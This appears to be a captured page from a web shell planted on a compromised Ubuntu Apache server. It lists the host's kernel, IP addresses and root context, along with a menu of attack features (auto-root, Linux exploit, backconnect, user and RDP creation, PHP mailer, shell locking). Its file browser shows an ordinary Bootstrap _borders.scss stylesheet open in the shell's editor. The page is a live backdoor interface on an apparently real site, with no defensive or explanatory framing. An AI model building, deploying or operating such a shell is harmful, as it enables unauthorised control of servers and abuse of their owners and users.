Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
effiserv /
scss /
bootstrap /
utilities /
[ HOME SHELL ]
Name
Size
Permission
Action
_align.scss
420
B
-rw-r--r--
_background.scss
397
B
-rw-r--r--
_borders.scss
1.51
KB
-rw-r--r--
_clearfix.scss
37
B
-rw-r--r--
_display.scss
1.38
KB
-rw-r--r--
_embed.scss
727
B
-rw-r--r--
_flex.scss
2.4
KB
-rw-r--r--
_float.scss
320
B
-rw-r--r--
_position.scss
614
B
-rw-r--r--
_screenreaders.scss
115
B
-rw-r--r--
_sizing.scss
298
B
-rw-r--r--
_spacing.scss
1.37
KB
-rw-r--r--
_text.scss
1.31
KB
-rw-r--r--
_visibility.scss
121
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _borders.scss
// stylelint-disable declaration-no-important // // Border // .border { border: $border-width solid $border-color !important; } .border-top { border-top: $border-width solid $border-color !important; } .border-right { border-right: $border-width solid $border-color !important; } .border-bottom { border-bottom: $border-width solid $border-color !important; } .border-left { border-left: $border-width solid $border-color !important; } .border-0 { border: 0 !important; } .border-top-0 { border-top: 0 !important; } .border-right-0 { border-right: 0 !important; } .border-bottom-0 { border-bottom: 0 !important; } .border-left-0 { border-left: 0 !important; } @each $color, $value in $theme-colors { .border-#{$color} { border-color: $value !important; } } .border-white { border-color: $white !important; } // // Border-radius // .rounded { border-radius: $border-radius !important; } .rounded-top { border-top-left-radius: $border-radius !important; border-top-right-radius: $border-radius !important; } .rounded-right { border-top-right-radius: $border-radius !important; border-bottom-right-radius: $border-radius !important; } .rounded-bottom { border-bottom-right-radius: $border-radius !important; border-bottom-left-radius: $border-radius !important; } .rounded-left { border-top-left-radius: $border-radius !important; border-bottom-left-radius: $border-radius !important; } .rounded-circle { border-radius: 50% !important; } .rounded-0 { border-radius: 0 !important; }
Close